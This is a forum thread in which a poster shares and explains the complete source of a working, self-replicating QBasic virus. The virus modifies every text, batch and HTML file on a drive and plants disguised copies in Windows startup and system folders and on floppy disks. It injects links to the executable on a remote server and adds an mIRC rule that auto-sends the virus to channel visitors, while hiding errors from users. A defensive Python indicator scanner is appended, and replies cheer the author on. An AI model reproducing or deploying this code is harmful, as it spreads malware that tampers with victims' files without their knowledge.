Thread: Writing the QBasic Virus

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    734

    Writing the QBasic Virus

    Source code/Original Post: http://www.antionline.com/showthread...216#post541952

    Writing the QBasic Virus by Jethro
    ----------------------------------

    Index:

    o Introduction
    o Decisions
    o Source Code Explanations
    o Conclusion


    Introduction
    ------------

    With a sudden ballooning in size of crappy VBS virii over the last few
    years, I noticed that I had never seen a virus written in QBasic.

    So to be original, I wrote one and you can find it in the programming
    section of technorats, called ``qbasic_virus.htm`` or something like
    that.

    I got a lot of emails (7) after I wrote that and posted it on
    AntiOnline, from people wanting me to explain the code. So, I am
    writing this text.



    Decisions
    ---------

    Decisions I had to make while writing the virus were about what it was
    going to do. I wanted to make it un-destructive, because I think virii
    that actually wreck machines are both a waste of time and effort.

    Because I didn't want to use ASM in my virus (there's plenty of ASM
    virii out there), I was restricted, in that I couldn't make it
    really polymorphic or self-modifying, without losing sight of the
    objective, that I could mimic VBS virii and make a short and sweet
    piece of code.

    First of all, it had to actually do something, so you could call it a
    virus. So I made it write a line at the end of text (*.txt) files
    (which I think is pretty harmless) and two lines at the end of batch
    (*.bat) files (one being a :: comment).

    Then came the bulk of the code, how it was to spread. I studied my
    version of Microsoft Outlook Express for a while and realised that the
    best and most effective way for it to spread would be through the
    email (*.eml) files and the Stationery (which happen to be *.htm)
    files.

    I also wanted it to spread through *.htm* files, so any web designers
    publishing web pages would have a on their pages
    which said that they were infected.

    It just so happened that I was able to mix the webpage spreading device
    and the email spreading device together, so if the virus found that it
    was infecting a page in a Microsoft directory, it would treat it as a
    Stationery file and just put a link to the virus, which was to be put
    up on some server.

    I had seen many VBS virii which spread through mIRC, so, like the
    I-Love-You virus, I put a line in the script.ini file in the mIRC
    directory (if it existed on the computer) which would DCC the virus to
    whoever joined the channel that the infected user was in.

    My last two decisions were that I wanted the virus to spread locally
    around the infectee's computer and I wanted it to spread across floppy
    disks.

    So I wrote down on a piece of paper what I wanted it to do and I scored
    off each objective as I had completed it. Here is the source code
    (which as I have said, can be accessed through my website) and my
    explanations as to why I put something in and what it does.

    You're probably going to need at least a basic (no pun intended)
    understanding of QBasic, because this is not a QBasic tutorial.



    Source Code Explanations
    ------------------------

    ****
    ' Written by Jethro
    ' Have a Nice day!
    ****

    That part is just my intro, so anybody looking at the source code would
    know who made it and could guess what it's called (niceday.exe)

    ****
    DECLARE SUB DRAWWINDOW ()
    DECLARE SUB INFECTFILES ()
    DECLARE SUB SPREAD2MIRC ()
    DECLARE SUB REMOTESPREAD ()
    DECLARE SUB SPREAD (file2spr$, where2spr$)
    DECLARE SUB INFECTHTML ()
    DECLARE SUB IFEXIST (filen$)
    DECLARE SUB INFECTBATCH ()
    DECLARE SUB INFECTFLOPPY ()
    ****

    Just declaring the subs.

    ****
    COMMON SHARED itexist, nodrive

    itexist = 0
    nodrive = 0
    ****

    That is just so I can use those variables in every sub. ``itexist`` is
    what I am using to check if a file exists and ``nodrive`` is what I am
    using to check whether the floppy drive is functioning.

    ****
    ON ERROR GOTO ohsoz
    ****

    That is so it doesn't spit up an ugly error. How embarrassing would it
    be, if a user, thinking it was just a normal program, saw "Floppy
    Drive not found" or something?

    ****
    blinks = 2

    FOR i = 1 TO blinks
    CLS
    LOCATE 5, 12: PRINT "Jethro Perazza Jones"
    LOCATE 6, 13: PRINT "Have a Nice Day Now"
    SLEEP 1
    DRAWWINDOW
    SLEEP 1
    NEXT i
    ****

    That is just my fancy entrance message. My ``DRAWWINDOW`` sub does the
    bulk of it, ie. actually drawing the window.

    ****
    INFECTFILES

    SPREAD2MIRC

    REMOTESPREAD

    INFECTHTML

    INFECTBATCH

    INFECTFLOPPY
    ****

    This is just calling the subs. When I was posting the source code, I
    was debating whether I should comment these out, so someone with no
    QBasic knowledge, but who was trying to run this anyway, wouldn't get
    it to work. But I decided not to, in case I got a load of emails saying
    ``Your virus doesn't work! WAAAA!``

    ****
    ohsoz:

    errorhandler:

    SELECT CASE ERR

    CASE IS = 71
    nodrive = 1

    END SELECT

    RESUME NEXT
    ****

    This is the error handler and also works to tell the ``INFECTFLOPPY``
    sub that there is no floppy disk in the drive. Before I put in this
    error handler, I used to get BSODs, so I think it is a very welcome
    and important addition.

    ****
    SUB DRAWWINDOW
    LOCATE 4, 10: PRINT "É"
    LOCATE 5, 10: PRINT "º"
    LOCATE 6, 10: PRINT "º"
    LOCATE 7, 10: PRINT "È"
    LOCATE 4, 48: PRINT "»"
    LOCATE 5, 48: PRINT "º"
    LOCATE 6, 48: PRINT "º"
    LOCATE 7, 48: PRINT "¼"
    FOR i = 11 TO 47
    LOCATE 4, i: PRINT "Í"
    LOCATE 7, i: PRINT "Í"
    NEXT i
    END SUB
    ****

    Pointless sub, just draws the window for the entrance screen. Also,
    gives you a few seconds to quit, if you accidentally run the virus
    yourself!

    ****
    SUB IFEXIST (filen$)
    fred$ = ""
    SHELL "DIR " + filen$ + " /b>files.$$$"
    OPEN "files.$$$" FOR INPUT AS #1
    DO WHILE NOT (EOF(1))
    INPUT #1, fred$
    LOOP
    CLOSE #1: KILL "files.$$$"
    IF NOT LEN(fred$) >= 1 THEN itexist = 0
    IF LEN(fred$) >= 1 THEN itexist = 1
    END SUB
    ****

    I have to admit, this is one cool looking sub. Ugly, but cool
    nonetheless. Basically, this issues a DIR for the file in question and
    if it exists, the ``itexist`` variable is given the value 1, if not,
    it is given the value 0. Boolean-style.

    ****
    SUB INFECTBATCH
    SHELL "DIR C:\*.bat /B /S>batch.$$$"
    OPEN "batch.$$$" FOR INPUT AS #1
    DO WHILE NOT (EOF(1))
    INPUT #1, file2do$
    OPEN file2do$ FOR APPEND AS #2
    PRINT #2, ""
    PRINT #2, "echo Ran %0"
    PRINT #2, ":: Having a good day?"
    CLOSE #2
    CLOSE #1
    LOOP
    KILL "batch.$$$"
    END SUB
    ****

    This basically runs through all the batch files on the system and adds
    two lines to it. The blank line at the start just puts the text on a
    new line. "echo Ran %0" will just print out to the screen "Ran
    <program name>" and the ":: Having a good day?" is just a comment and
    will be ignored by the MS-DOS command interpreter. You can see how
    easy it would be to issue a KILL command on all the batch files, but
    that would be stupid and mean.

    ****
    SUB INFECTFILES
    PRINT "Scanning for files..."
    SHELL "DIR C:\*.txt /S /B>phy.lst"
    OPEN "phy.lst" FOR INPUT AS #1
    DO WHILE NOT (EOF(1))
    INPUT #1, phyle$
    OPEN phyle$ FOR APPEND AS #2
    PRINT #2, ""
    PRINT #2, "Jethro P. Jones says: 'Have a nice day now!'"
    CLOSE #2
    LOOP
    CLOSE #1
    KILL "phy.lst"
    PRINT "Scanning for needed drivers..."
    END SUB
    ****

    This basically does the same as the ``INFECTBATCH`` sub, only it adds
    one line to all *.txt files.

    ****
    SUB INFECTFLOPPY
    ON ERROR GOTO errorhandler
    SPREAD "niceday.exe", "A:\niceday.exe"
    END SUB
    ****

    This basically sends ``niceday.exe`` to the floppy disk, if it is in
    the floppy drive.

    ****
    SUB INFECTHTML
    SHELL "DIR C:\*.htm* /B /S>tempfile.$$$"
    OPEN "tempfile.$$$" FOR INPUT AS #1
    DO WHILE NOT (EOF(1))
    INPUT #1, file2do$
    OPEN file2do$ FOR APPEND AS #2
    PRINT #2, ""
    IF NOT INSTR(file2do$, "micros") THEN PRINT #2, ""
    IF INSTR(file2do$, "micros") THEN PRINT #2, "<a href=http://www.myserver.com/jethro/happyday.exe>Download this for a very happy day!</a>"
    CLOSE #2
    LOOP
    CLOSE #1
    KILL "tempfile.$$$"
    END SUB
    ****

    This infects HTML files. If they are in a Microsoft folder (like
    Stationery files), it adds a link to a program (the virus) on a
    server, if not, it just adds a comment to the page, because it's
    possibly a webpage ready for publication.

    ****
    SUB REMOTESPREAD
    SPREAD "niceday.exe", "C:\WINDOWS\niceday.exe"
    SPREAD "niceday.exe", "C:\WINDOWS\SYSTEM\winpgup.exe"
    SPREAD "niceday.exe", "C:\WINDOWS\COMMAND\win32dice.exe"
    SPREAD "niceday.exe", "C:\autoexec.exe"
    SPREAD "niceday.exe", "C:\WINDOWS\StartM~1\Progra~1\Startup\win32pgup.exe"
    SPREAD "niceday.exe", "C:\WINDOWS\Progra~1\niceday.exe"
    END SUB
    ****

    This just spreads the virus about a bit, locally in the computer.

    ****
    SUB SPREAD (file2spr$, where2spr$)
    SHELL "COPY " + file2spr$ + " " + where2spr$ + ">nul"
    END SUB
    ****

    This just helps spread the file about easily.

    ****
    SUB SPREAD2MIRC
    ON ERROR GOTO ohsoz
    IFEXIST "C:\mirc\script.ini": IF itexist = 0 THEN GOTO 5
    OPEN "C:\mirc\script.ini" FOR OUTPUT AS #1
    PRINT #1, "[script]"
    PRINT #1, "n0=on 1:JOIN:#:/.dcc send -c $nick C:\WINDOWS\niceday.exe"
    CLOSE #1
    5
    END SUB
    ****

    This adds a line to mIRC's script.ini file so it can spread easily
    through IRC.



    Conclusion
    ----------

    Even just writing this text, I can see ways of optimising the code and
    I have new ideas, so don't be surprised if you see a sequel to the
    NiceDay.exe virus.

    Have fun,
    Jethro
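
For anyone triaging a machine against the behaviour described in the post above, here is an indicator scan added as an example (it is not part of the original post). It looks for the appended text and batch markers, the mIRC `script.ini` auto-send line and the copy names listed in the subs; the function names and the sample tree in `demo()` are constructed for this example.

```python
import re
import tempfile
from pathlib import Path

TXT_MARKER = "Jethro P. Jones says: 'Have a nice day now!'"   # INFECTFILES
BAT_MARKERS = ("echo Ran %0", ":: Having a good day?")        # INFECTBATCH
MIRC_RE = re.compile(r"on\s+1:JOIN:#:\s*/\.?dcc\s+send\b", re.I)  # SPREAD2MIRC
DROP_NAMES = {"niceday.exe", "winpgup.exe", "win32dice.exe",
              "autoexec.exe", "win32pgup.exe"}                # REMOTESPREAD

def tail_lines(path, n=4):
    """Last n non-blank lines; every sub in the post appends at end of file."""
    text = path.read_text(encoding="latin-1")
    return [ln.strip() for ln in text.splitlines() if ln.strip()][-n:]

def classify(path):
    """Return a finding label for one file, or None when nothing matches."""
    name, ext = path.name.lower(), path.suffix.lower()
    if name in DROP_NAMES:
        return "dropped-copy-name"      # a lead only: names can collide
    if ext == ".txt" and TXT_MARKER in tail_lines(path):
        return "txt-marker"
    if ext == ".bat" and all(m in tail_lines(path) for m in BAT_MARKERS):
        return "bat-marker"
    if name == "script.ini" and MIRC_RE.search(path.read_text(encoding="latin-1")):
        return "mirc-autosend"
    return None

def scan(root):
    """Walk root and return {relative path: finding} for every hit."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): f
            for p in sorted(root.rglob("*"))
            if p.is_file() and (f := classify(p))}

def demo():
    """Scan a constructed sample tree (file contents made up for this example)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "mirc").mkdir()
        (root / "notes.txt").write_text("shopping list\n\n" + TXT_MARKER + "\n")
        (root / "run.bat").write_text("@echo off\ndir\n\necho Ran %0\n:: Having a good day?\n")
        (root / "build.bat").write_text("@echo off\necho Ran %0\ncopy a b\n")
        (root / "mirc" / "script.ini").write_text(
            "[script]\nn0=on 1:JOIN:#:/.dcc send -c $nick C:\\WINDOWS\\niceday.exe\n")
        (root / "WINPGUP.EXE").write_bytes(b"MZ constructed placeholder")
        return scan(root)

if __name__ == "__main__":
    print(demo())
```

The batch check requires both appended lines together, so a script that merely contains `echo Ran %0` (like `build.bat` in the sample) is not flagged; a file-name hit alone should be confirmed by other means before acting on it.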

  2. #2
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    very nice - anyone who hasn't already been to Jethro's technorats site I can heartily recommend it!

    Keep up the good work Jethro!
    "I may not agree with what you say, but I will defend to the death your right to say it."
    Sir Winston Churchill.

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    734
    Ah shucks

    Originally posted here by ntsa
    very nice - anyone who hasn't already been to Jethro's technorats site I can heartily recommend it!

    Keep up the good work Jethro!

  4. #4
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584
    lol dang.. brings back old memories

  5. #5
    Banned
    Join Date
    Jun 2002
    Posts
    6
    Awesome man I'm just starting 2 learn QB give me a shout some time aight
